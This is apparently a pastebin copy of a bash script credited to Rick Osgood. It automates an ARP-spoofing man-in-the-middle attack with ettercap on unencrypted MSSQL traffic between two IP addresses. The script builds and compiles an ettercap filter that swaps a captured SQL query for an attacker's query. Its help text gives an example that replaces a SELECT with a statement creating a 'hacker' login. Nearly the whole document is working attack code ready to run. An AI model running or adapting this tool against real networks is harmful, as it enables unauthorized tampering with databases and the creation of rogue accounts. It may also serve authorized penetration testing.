SHOW:
|
|
- or go back to the newest paste.
| 1 | #!/bin/bash | |
| 2 | # | |
| 3 | #################################################################### | |
| 4 | # | |
| 5 | # Written by Rick Osgood | |
| 6 | # | |
| 7 | # This script is designed to automate the process of hijacking an | |
| 8 | # MSSQL database connection. This script can be used to perform a | |
| 9 | # MITM attack between two IP addresses using ettercap and ARP | |
| 10 | # spoofing. You also submit an original SQL query and a new SQL | |
| 11 | # query. The script will create, compile, and load an ettercap | |
| 12 | # filter to replace the original SQL string with your new one. | |
| 13 | # This should work on any MSSQL conncetion that is not encrypted. | |
| 14 | # | |
| 15 | #################################################################### | |
| 16 | ||
| 17 | args=("$@") #array to store command line arguments
| |
| 18 | ||
| 19 | # Set variable defalts | |
| 20 | SqlPort=1433 | |
| 21 | ServerIP="NULL" | |
| 22 | ClientIP="NULL" | |
| 23 | FileName="NULL" | |
| 24 | ||
| 25 | # Help function | |
| 26 | print_help(){
| |
| 27 | echo "Usage: ./SQLInject.sh -o [original SQL query] -i [new SQL query] -s [MSSQL Server IP] | |
| 28 | -c [SQL Client IP]" | |
| 29 | echo "" | |
| 30 | echo "Example: ./SQLInject.sh -o \"SELECT * from Products WHERE ProductID=1;\" -i \"CREATE L | |
| 31 | OGIN hacker WITH PASSWORD=\"password01\";\" -s 10.0.1.20 -c 10.0.1.100" | |
| 32 | echo "" | |
| 33 | echo "This script creates an ettercap filter that will identify a SQL string" | |
| 34 | echo "and replace it with a new string. The script will then compile the filter" | |
| 35 | echo "and run ettercap with the filter loaded. Ettercap will perform an ARP" | |
| 36 | echo "spoofing attack against the specified IP addresses automatically. All you" | |
| 37 | echo "have to do is sit back and wait for the original query to be submitted." | |
| 38 | echo "" | |
| 39 | echo " --help" | |
| 40 | echo " Show this message." | |
| 41 | echo " -o" | |
| 42 | echo " Specify the original SQL string to be replaced." | |
| 43 | echo " -i" | |
| 44 | echo " Specify the new SQL string to be injected. This string must not" | |
| 45 | echo " longer than the original query string." | |
| 46 | echo " -s" | |
| 47 | echo " Specify the MSSQL server IP for ARP poison attack. May also use gateway IP" | |
| 48 | echo " -c" | |
| 49 | echo " Specify the SQL cient IP for ARP poison attack." | |
| 50 | echo " -f" | |
| 51 | echo " Specify the output filename for the ettercap filter." | |
| 52 | echo " -p" | |
| 53 | echo " Optional. Specifiy the MSSQL traffic port. Defaults to 1433." | |
| 54 | } | |
| 55 | ||
| 56 | # If not enough arguments then quit | |
| 57 | if [ $# -lt "4" ]; then | |
| 58 | print_help | |
| 59 | exit 1 | |
| 60 | fi | |
| 61 | ||
| 62 | COUNTER=0 #Count from zero to number of arguments | |
| 63 | while [ $COUNTER -lt $# ]; do | |
| 64 | if [ "${args[$COUNTER]}" == "--help" ]; then
| |
| 65 | print_help | |
| 66 | exit 0 | |
| 67 | ||
| 68 | elif [ "${args[$COUNTER]}" == "-o" ]; then
| |
| 69 | COUNTER=$(($COUNTER+1)) | |
| 70 | OldQuery=${args[$COUNTER]}
| |
| 71 | ||
| 72 | elif [ "${args[$COUNTER]}" == "-i" ]; then
| |
| 73 | COUNTER=$((COUNTER+1)) | |
| 74 | NewQuery=${args[$COUNTER]}
| |
| 75 | ||
| 76 | elif [ "${args[$COUNTER]}" == "-s" ]; then
| |
| 77 | COUNTER=$((COUNTER+1)) | |
| 78 | ServerIP=${args[$COUNTER]}
| |
| 79 | ||
| 80 | elif [ "${args[$COUNTER]}" == "-c" ]; then
| |
| 81 | COUNTER=$((COUNTER+1)) | |
| 82 | ClientIP=${args[$COUNTER]}
| |
| 83 | ||
| 84 | elif [ "${args[$COUNTER]}" == "-f" ]; then
| |
| 85 | COUNTER=$((COUNTER+1)) | |
| 86 | FileName=${args[$COUNTER]}
| |
| 87 | ||
| 88 | elif [ "${args[$COUNTER]}" == "-p" ]; then
| |
| 89 | COUNTER=$((COUNTER+1)) | |
| 90 | SqlPort=${args[$COUNTER]}
| |
| 91 | ||
| 92 | else | |
| 93 | echo "Error: Unknown argument \"${args[$COUNTER]}\""
| |
| 94 | echo "" | |
| 95 | print_help | |
| 96 | exit 1 | |
| 97 | fi | |
| 98 | ||
| 99 | COUNTER=$(($COUNTER+1)) | |
| 100 | done; | |
| 101 | ||
| 102 | # Is anything missing? | |
| 103 | if [ "$ServerIP" == "NULL" ]; then | |
| 104 | echo "You must specify server IP!" | |
| 105 | exit 1 | |
| 106 | ||
| 107 | elif [ "$ClientIP" == "NULL" ]; then | |
| 108 | echo "You must specify client IP!" | |
| 109 | exit 1 | |
| 110 | ||
| 111 | elif [ "$FileName" == "NULL" ]; then | |
| 112 | echo "You must specify the file name for the ettercap filter!" | |
| 113 | exit 1 | |
| 114 | fi | |
| 115 | ||
| 116 | # Calculate length of injected SQL query | |
| 117 | length2=`echo $NewQuery | wc -m` | |
| 118 | length2=$((length2 - 1)) | |
| 119 | echo "New string is $length2 bytes" | |
| 120 | ||
| 121 | # Calculate length of original SQL query | |
| 122 | length1=`echo $OldQuery | wc -m` | |
| 123 | length1=$((length1 - 1)) | |
| 124 | echo "Original string is $length1 bytes" | |
| 125 | ||
| 126 | # What's the difference? | |
| 127 | difference=$((length1 - length2)) | |
| 128 | echo "Difference is $difference bytes" | |
| 129 | ||
| 130 | # If the new string is too long it won't work | |
| 131 | if [ $difference -lt 0 ]; then | |
| 132 | echo "" | |
| 133 | echo "New SQL query is longer than original! Quitting..." | |
| 134 | exit 0 | |
| 135 | fi | |
| 136 | ||
| 137 | temp="" | |
| 138 | for i in `seq 1 $difference`; | |
| 139 | do | |
| 140 | temp="$temp " | |
| 141 | done | |
| 142 | PaddedQuery="$NewQuery$temp" | |
| 143 | echo "PaddedQuery is \"$PaddedQuery\"" | |
| 144 | echo "" | |
| 145 | ||
| 146 | IFS=$'\n' # change separater to newline only. Required or the for loop skips spaces | |
| 147 | ||
| 148 | echo "Converting original query to hex..." | |
| 149 | # Convert original query to hex string with NULL padding (How it appears over the wire) | |
| 150 | OldQueryHex="" | |
| 151 | for line in $(echo $OldQuery | sed -e 's/\(.\)/\1\n/g') | |
| 152 | do | |
| 153 | OldQueryHex="$OldQueryHex\x" | |
| 154 | temp=`echo $line | hexdump -C |head -n1 | awk -F" " {'print $2'} | awk {'print $1'}`
| |
| 155 | OldQueryHex="$OldQueryHex$temp" | |
| 156 | OldQueryHex="$OldQueryHex\x00" | |
| 157 | done | |
| 158 | ||
| 159 | echo "Converting new query to hex..." | |
| 160 | # Convert new query to hex string now. | |
| 161 | NewQueryHex="" | |
| 162 | for line in $(echo $PaddedQuery | sed -e 's/\(.\)/\1\n/g') | |
| 163 | do | |
| 164 | NewQueryHex="$NewQueryHex\x" | |
| 165 | temp=`echo $line | hexdump -C |head -n1 | awk -F" " {'print $2'} | awk {'print $1'}`
| |
| 166 | NewQueryHex="$NewQueryHex$temp" | |
| 167 | NewQueryHex="$NewQueryHex\x00" | |
| 168 | done | |
| 169 | ||
| 170 | echo "Writing ettercap filter now..." | |
| 171 | ||
| 172 | # Start writing actual ettercap filter file | |
| 173 | echo "if (ip.proto == TCP && tcp.dst == $SqlPort) {" > $FileName
| |
| 174 | echo " msg(\"SQL traffic discovered\");" >> $FileName | |
| 175 | echo " if (search(DATA.data,\"$OldQueryHex\")) {" >> $FileName
| |
| 176 | echo " msg(\"Found our string!\");" >> $FileName | |
| 177 | echo " replace(\"$OldQueryHex\",\"$NewQueryHex\");" >> $FileName | |
| 178 | echo " msg(\"...and replaced it :)\");" >> $FileName | |
| 179 | echo " }" >> $FileName | |
| 180 | echo "}" >> $FileName | |
| 181 | ||
| 182 | # Exeute etterfilter to create the compiled filter | |
| 183 | etterfilter $FileName -o $FileName.ef | |
| 184 | ||
| 185 | # Execute ettercap and load the filter | |
| 186 | ettercap -T -q -F ./$FileName.ef -M ARP //$ServerIP// //$ClientIP// | |
| 187 | ||
| 188 | echo "" | |
| 189 | echo "Completed Successfully!" |
